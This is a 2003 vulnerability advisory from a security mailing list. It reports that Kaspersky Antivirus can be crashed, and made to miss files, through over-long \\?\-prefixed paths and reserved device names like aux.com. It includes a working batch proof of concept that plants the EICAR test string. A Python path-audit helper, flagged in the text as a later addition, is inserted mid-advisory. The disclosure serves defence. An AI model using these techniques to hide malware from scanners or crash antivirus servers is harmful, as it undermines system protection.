SECURITY.NNOV: Kaspersky Antivirus DoS

From: 3APA3A (3APA3Aat_private)
Date: Tue Feb 11 2003 - 02:09:58 PST


    Title:                     Kaspersky Antivirus DoS
    Affected:                  Kaspersky  Antivirus 4.0.9.0
                               (Server and Workstation version on
                               Windows NT 4.0 and Windows 2000).
    Author:                    ZARAZA <3APA3Aat_private>
    Vendor:                    Kaspersky Lab
    Date:                      January 30, 2003
    Risk:                      Average
    Exploitable:               Yes
    Remote:                    Yes (for server versions)
    Vendor Notified:           January 30, 2003
    
    I. Introduction:
    
    Kaspersky Antivirus (KAV) is a family of anti-virus products.
    
    II. Vulnerability:
    
    Several vulnerabilities were identified. The most serious allows a user
    to crash the anti-virus server remotely (write access to any directory
    on the remote server is required).
    
    1. Long path crash
    2. Long path prevents malware from detection
    3. Special name prevents malware from detection
    
    III. Details:
    
    1. Long path crash
    
    The NTFS file system allows paths of almost unlimited length, but the
    Win32 API rejects paths longer than MAX_PATH (260 characters). Prefixing
    a file name with \\?\ tells the Win32 API to pass the path to the file
    system without parsing or length checking; this is a documented feature
    of the Windows API. Paths longer than 256 characters cause the KAV
    monitor service to crash, or to hang at 100% CPU usage. The possibility
    of code execution has not been researched.
    
    2. Long path prevents malware from detection
    
    Such a long path also prevents the anti-virus scanner from detecting
    malware stored under it: the scanner never opens the file.
    
    
    3. Special name prevents malware from detection
    
    Using the same \\?\ prefix it is possible to create an NTFS file whose
    name is a reserved DOS device name, for example aux.vbs or aux.com.
    Win32 calls without the prefix resolve such a name to the device rather
    than to the file, so malware in this file is not detected.
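    The following Python helper is an added example, not part of the
    advisory and not Kaspersky code. It shows the check a scanner or file
    integrity tool should make on a file listing: it flags the three path
    shapes from sections 1 to 3 (extended-length \\?\ prefix, path length
    at or beyond MAX_PATH, and a component whose stem is a reserved DOS
    device name). The function names and the sample listing are
    constructed for illustration; MAX_PATH and the device-name list are
    Win32 facts, and the stem rule (compare the part before the first '.',
    ignoring trailing spaces and dots) matches how Win32 resolves device
    names.

```python
"""Flag path shapes that a Win32-bound file scanner may never see.

Added example (not from the advisory): audit_path() reports the evasion
shapes the advisory describes, so a file listing (from a share export or
a forensic image, for instance) can be checked offline.
"""
import re

MAX_PATH = 260  # Win32 MAX_PATH: 259 characters plus the terminating NUL
EXTENDED_PREFIX = "\\\\?\\"           # \\?\  turns off Win32 path parsing
EXTENDED_UNC_PREFIX = "\\\\?\\UNC\\"  # \\?\UNC\server\share form

# DOS device names that Win32 path parsing resolves to a device, not a file.
# The comparison uses the name up to the first '.', so aux.com and aux.vbs
# both resolve to AUX.
RESERVED_DEVICES = (
    {"CON", "PRN", "AUX", "NUL"}
    | {f"COM{i}" for i in range(1, 10)}
    | {f"LPT{i}" for i in range(1, 10)}
)


def to_win32_path(path):
    """Strip the extended-length prefix; return (win32_path, had_prefix)."""
    if path.startswith(EXTENDED_UNC_PREFIX):
        return "\\\\" + path[len(EXTENDED_UNC_PREFIX):], True
    if path.startswith(EXTENDED_PREFIX):
        return path[len(EXTENDED_PREFIX):], True
    return path, False


def reserved_device_components(path):
    """Return each path component whose stem is a reserved DOS device name."""
    hits = []
    for comp in re.split(r"[\\/]+", path):
        if not comp:
            continue
        # Win32 ignores trailing spaces and dots and compares the part
        # before the first '.', so "aux.com" and "nul.txt " both match.
        stem = comp.rstrip(" .").split(".", 1)[0]
        if stem.upper() in RESERVED_DEVICES:
            hits.append(comp)
    return hits


def audit_path(path):
    """Return a list of findings; an empty list means the path looks ordinary."""
    win32, extended = to_win32_path(path)
    findings = []
    if extended:
        findings.append("extended-length prefix")
    # Without the prefix Win32 accepts at most MAX_PATH-1 characters plus NUL.
    if len(win32) >= MAX_PATH:
        findings.append(f"exceeds MAX_PATH ({len(win32)} chars)")
    for comp in reserved_device_components(win32):
        findings.append(f"reserved device name: {comp}")
    return findings


def audit_listing(paths):
    """Map each suspicious path to its findings; ordinary paths are omitted."""
    result = {}
    for p in paths:
        findings = audit_path(p)
        if findings:
            result[p] = findings
    return result


# Constructed sample listing (not real data); mirrors the advisory's shapes.
A = "A" * 200  # same idea as the advisory's SET A=AAAA... line
SAMPLE_LISTING = [
    "c:\\Windows\\notepad.exe",
    "\\\\?\\c:\\aux.com",
    "\\\\?\\c:\\" + "\\".join([A] * 7) + ".com",
    "c:\\temp\\com1.vbs",
    "\\\\?\\UNC\\fileserver\\share\\nul.txt",
]

if __name__ == "__main__":
    for path, findings in audit_listing(SAMPLE_LISTING).items():
        shown = path if len(path) <= 60 else path[:60] + "..."
        print(f"{shown} -> {'; '.join(findings)}")
```

    Run it directly to see the four suspicious entries of the sample listing
    reported; the ordinary notepad.exe path produces no finding. In a real
    deployment the listing would come from an NTFS-level enumeration (one that
    itself uses the \\?\ prefix), since a Win32 enumeration without the prefix
    is exactly what misses these files.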
    
    IV. Exploit:
    
    The following .bat file demonstrates the vulnerabilities.
    
    1,2 Long path crash & Long path prevents malware from detection
    
    @echo off
    REM A is a long run of A's; seven nested directories named A give a path far beyond MAX_PATH.
    SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    REM The \\?\ prefix bypasses the Win32 MAX_PATH check, so each level is created on NTFS.
    mkdir \\?\c:\%A%
    mkdir \\?\c:\%A%\%A%
    mkdir \\?\c:\%A%\%A%\%A%
    mkdir \\?\c:\%A%\%A%\%A%\%A%
    mkdir \\?\c:\%A%\%A%\%A%\%A%\%A%
    mkdir \\?\c:\%A%\%A%\%A%\%A%\%A%\%A%
    REM Write the EICAR test string under the deep path (%% and ^^ are batch escapes for % and ^).
    echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >\\?\c:\%A%\%A%\%A%\%A%\%A%\%A%\%A%.com
    
    3. Special name prevents malware from detection
    
    REM aux is a reserved DOS device name; the \\?\ prefix lets the file be created anyway.
    echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >\\?\c:\aux.com
    
    
    V. Vendor
    
    No response from vendor.
    
    -- 
    http://www.security.nnov.ru
             /\_/\
            { , . }     |\
    +--oQQo->{ ^ }<-----+ \
    |  ZARAZA  U  3APA3A   }
    +-------------o66o--+ /
                        |/
    You know my name - look up my number (The Beatles)
    